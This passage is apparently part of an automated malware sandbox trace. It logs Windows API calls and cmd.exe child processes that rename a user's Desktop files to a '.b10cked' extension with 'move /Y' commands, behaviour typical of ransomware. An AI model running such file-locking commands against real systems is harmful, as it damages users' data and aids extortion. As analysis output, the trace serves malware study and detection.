lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f7a4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0232.052] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0232.052] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0232.052] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0232.052] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0232.052] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0232.052] _wcsicmp (_String1="MPZFED~1.FLV", _String2=".") returned 63 [0232.052] _wcsicmp (_String1="MPZFED~1.FLV", _String2="..") returned 63 [0232.052] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\MPZFED~1.FLV" (normalized: "c:\\users\\eebsym5\\desktop\\mpzfed~1.flv")) returned 0x20 [0232.053] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x281d40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.053] SetErrorMode (uMode=0x0) returned 0x0 [0232.053] SetErrorMode (uMode=0x1) returned 0x0 [0232.053] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\MPZFED~1.FLV", nBufferLength=0x104, lpBuffer=0x16f134, lpFilePart=0x16f11c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\MPZFED~1.FLV", lpFilePart=0x16f11c*="MPZFED~1.FLV") returned 0x25 [0232.053] SetErrorMode (uMode=0x0) returned 0x1 [0232.053] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0232.053] _wcsicmp (_String1="MPZFED~1.FLV", _String2=".") returned 63 [0232.053] _wcsicmp (_String1="MPZFED~1.FLV", _String2="..") returned 63 [0232.053] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\MPZFED~1.FLV" (normalized: "c:\\users\\eebsym5\\desktop\\mpzfed~1.flv")) returned 0x20 [0232.053] SetErrorMode (uMode=0x0) returned 0x0 [0232.053] SetErrorMode (uMode=0x1) returned 0x0 [0232.053] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\MPZFED~1.FLV", nBufferLength=0x104, lpBuffer=0x16f5b0, lpFilePart=0x16f348 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\MPZFED~1.FLV", lpFilePart=0x16f348*="MPZFED~1.FLV") returned 0x25 [0232.053] SetErrorMode (uMode=0x0) returned 0x1 [0232.053] SetErrorMode (uMode=0x0) returned 0x0 [0232.054] SetErrorMode (uMode=0x1) returned 0x0 [0232.054] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv.b10cked", nBufferLength=0x104, lpBuffer=0x16f7b8, lpFilePart=0x16f348 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv.b10cked", lpFilePart=0x16f348*="mPZFEDoY9Zi_en.flv.b10cked") returned 0x33 [0232.054] SetErrorMode (uMode=0x0) returned 0x1 [0232.054] SetLastError (dwErrCode=0x0) [0232.054] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\mpzfedoy9zi_en.flv.b10cked")) returned 0xffffffff [0232.054] GetLastError () returned 0x2 [0232.054] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\MPZFED~1.FLV", fInfoLevelId=0x1, lpFindFileData=0x16ecc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ecc4) returned 0x270f08 [0232.054] FindNextFileW (in: hFindFile=0x270f08, lpFindFileData=0x16ecc4 | out: lpFindFileData=0x16ecc4) returned 0 [0232.055] GetLastError () returned 0x12 [0232.055] FindClose (in: hFindFile=0x270f08 | out: hFindFile=0x270f08) returned 1 [0232.056] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\MPZFED~1.FLV", fInfoLevelId=0x1, lpFindFileData=0x281ae0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x281ae0) returned 0x270f08 [0232.056] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv.b10cked", nBufferLength=0x104, lpBuffer=0x16ef5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv.b10cked", lpFilePart=0x0) returned 0x33 [0232.056] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv", nBufferLength=0x104, lpBuffer=0x16ef5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv", lpFilePart=0x0) returned 0x2b [0232.056] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv" (normalized: "c:\\users\\eebsym5\\desktop\\mpzfedoy9zi_en.flv")) returned 0x20 [0232.056] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv" (normalized: "c:\\users\\eebsym5\\desktop\\mpzfedoy9zi_en.flv"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\mpzfedoy9zi_en.flv.b10cked"), dwFlags=0x3) returned 1 [0232.057] FindClose (in: hFindFile=0x270f08 | out: hFindFile=0x270f08) returned 1 [0232.057] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x16ef10 | out: _Buffer=" 1") returned 9 [0232.057] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.057] GetFileType (hFile=0x7) returned 0x2 [0232.144] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0232.144] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16ee9c | out: lpMode=0x16ee9c) returned 1 [0232.145] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.145] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16eed0 | out: lpConsoleScreenBufferInfo=0x16eed0) returned 1 [0232.146] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0232.146] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x16ef10 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0232.146] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x16eef4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x16eef4*=0x1a) returned 1 [0232.149] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.149] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.174] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.174] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0232.175] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.175] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0232.176] SetConsoleInputExeNameW () returned 0x1 [0232.176] GetConsoleOutputCP () returned 0x1b5 [0232.177] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.177] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.178] exit (_Code=0) Process: id = "611" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d20" os_pid = "0x910" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\SXGPQH~1.ODP\" \"C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv i4OFxmN5_1.odp.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34385 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34386 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34387 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34388 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 34389 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34390 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34391 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34392 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34393 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 34394 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34543 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34544 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34545 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34546 start_va = 0x310000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 34547 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 34548 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34549 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34550 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34551 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34552 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34553 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34554 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34555 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34556 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34557 start_va = 0x200000 end_va = 0x2c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 34558 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34559 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34560 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 34561 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 34562 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 34563 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 34564 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 34565 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 34566 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Thread: id = 849 os_tid = 0x234 [0231.807] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fe7c | out: lpSystemTimeAsFileTime=0x18fe7c*(dwLowDateTime=0xbdb83620, dwHighDateTime=0x1d440a9)) [0231.807] GetCurrentProcessId () returned 0x910 [0231.807] GetCurrentThreadId () returned 0x234 [0231.807] GetTickCount () returned 0x3fc96 [0231.807] QueryPerformanceCounter (in: lpPerformanceCount=0x18fe74 | out: lpPerformanceCount=0x18fe74*=28859876988) returned 1 [0231.813] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0231.813] __set_app_type (_Type=0x1) [0231.813] __p__fmode () returned 0x76b331f4 [0231.813] __p__commode () returned 0x76b331fc [0231.813] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0231.813] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0231.813] GetCurrentThreadId () returned 0x234 [0231.813] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x234) returned 0x38 [0231.813] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0231.813] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0231.813] SetThreadUILanguage (LangId=0x0) returned 0x409 [0231.814] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0231.814] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fe0c | out: phkResult=0x18fe0c*=0x0) returned 0x2 [0231.814] VirtualQuery (in: lpAddress=0x18fe43, lpBuffer=0x18fddc, dwLength=0x1c | out: lpBuffer=0x18fddc*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.814] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fddc, dwLength=0x1c | out: lpBuffer=0x18fddc*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0231.814] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fddc, dwLength=0x1c | out: lpBuffer=0x18fddc*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0231.814] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18fddc, dwLength=0x1c | out: lpBuffer=0x18fddc*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.814] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fddc, dwLength=0x1c | out: lpBuffer=0x18fddc*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0231.815] GetConsoleOutputCP () returned 0x1b5 [0231.815] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.815] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0231.815] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.815] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0231.816] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.816] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0231.817] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.817] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0231.817] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.817] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0231.818] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.818] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0231.822] GetEnvironmentStringsW () returned 0x380178* [0231.822] FreeEnvironmentStringsW (penv=0x380178) returned 1 [0231.822] GetEnvironmentStringsW () returned 0x380178* [0231.822] FreeEnvironmentStringsW (penv=0x380178) returned 1 [0231.822] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ed7c | out: phkResult=0x18ed7c*=0x40) returned 0x0 [0231.822] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ed84, lpData=0x18ed88, lpcbData=0x18ed80*=0x1000 | out: lpType=0x18ed84*=0x0, lpData=0x18ed88*=0xa0, lpcbData=0x18ed80*=0x1000) returned 0x2 [0231.822] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ed84, lpData=0x18ed88, lpcbData=0x18ed80*=0x1000 | out: lpType=0x18ed84*=0x4, lpData=0x18ed88*=0x1, lpcbData=0x18ed80*=0x4) returned 0x0 [0231.822] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ed84, lpData=0x18ed88, lpcbData=0x18ed80*=0x1000 | out: lpType=0x18ed84*=0x0, lpData=0x18ed88*=0x1, lpcbData=0x18ed80*=0x1000) returned 0x2 [0231.823] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ed84, lpData=0x18ed88, lpcbData=0x18ed80*=0x1000 | out: lpType=0x18ed84*=0x4, lpData=0x18ed88*=0x0, lpcbData=0x18ed80*=0x4) returned 0x0 [0231.823] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ed84, lpData=0x18ed88, lpcbData=0x18ed80*=0x1000 | out: lpType=0x18ed84*=0x4, lpData=0x18ed88*=0x40, lpcbData=0x18ed80*=0x4) returned 0x0 [0231.823] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ed84, lpData=0x18ed88, lpcbData=0x18ed80*=0x1000 | out: lpType=0x18ed84*=0x4, lpData=0x18ed88*=0x40, lpcbData=0x18ed80*=0x4) returned 0x0 [0231.823] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ed84, lpData=0x18ed88, lpcbData=0x18ed80*=0x1000 | out: lpType=0x18ed84*=0x0, lpData=0x18ed88*=0x40, lpcbData=0x18ed80*=0x1000) returned 0x2 [0231.823] RegCloseKey (hKey=0x40) returned 0x0 [0231.823] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ed7c | out: phkResult=0x18ed7c*=0x40) returned 0x0 [0231.823] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ed84, lpData=0x18ed88, lpcbData=0x18ed80*=0x1000 | out: lpType=0x18ed84*=0x0, lpData=0x18ed88*=0x40, lpcbData=0x18ed80*=0x1000) returned 0x2 [0231.823] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ed84, lpData=0x18ed88, lpcbData=0x18ed80*=0x1000 | out: lpType=0x18ed84*=0x4, lpData=0x18ed88*=0x1, lpcbData=0x18ed80*=0x4) returned 0x0 [0231.823] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ed84, lpData=0x18ed88, lpcbData=0x18ed80*=0x1000 | out: lpType=0x18ed84*=0x0, lpData=0x18ed88*=0x1, lpcbData=0x18ed80*=0x1000) returned 0x2 [0231.823] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ed84, lpData=0x18ed88, lpcbData=0x18ed80*=0x1000 | out: lpType=0x18ed84*=0x4, lpData=0x18ed88*=0x0, lpcbData=0x18ed80*=0x4) returned 0x0 [0231.823] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ed84, lpData=0x18ed88, lpcbData=0x18ed80*=0x1000 | out: lpType=0x18ed84*=0x4, lpData=0x18ed88*=0x9, lpcbData=0x18ed80*=0x4) returned 0x0 [0231.823] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ed84, lpData=0x18ed88, lpcbData=0x18ed80*=0x1000 | out: lpType=0x18ed84*=0x4, lpData=0x18ed88*=0x9, lpcbData=0x18ed80*=0x4) returned 0x0 [0231.823] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ed84, lpData=0x18ed88, lpcbData=0x18ed80*=0x1000 | out: lpType=0x18ed84*=0x0, lpData=0x18ed88*=0x9, lpcbData=0x18ed80*=0x1000) returned 0x2 [0231.823] RegCloseKey (hKey=0x40) returned 0x0 [0231.823] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863bf [0231.823] srand (_Seed=0x5b8863bf) [0231.823] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\SXGPQH~1.ODP\" \"C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv i4OFxmN5_1.odp.b10cked\"" [0231.823] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\SXGPQH~1.ODP\" \"C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv i4OFxmN5_1.odp.b10cked\"" [0231.824] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.824] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3818d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0231.824] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0231.824] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0231.824] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.824] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0231.824] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 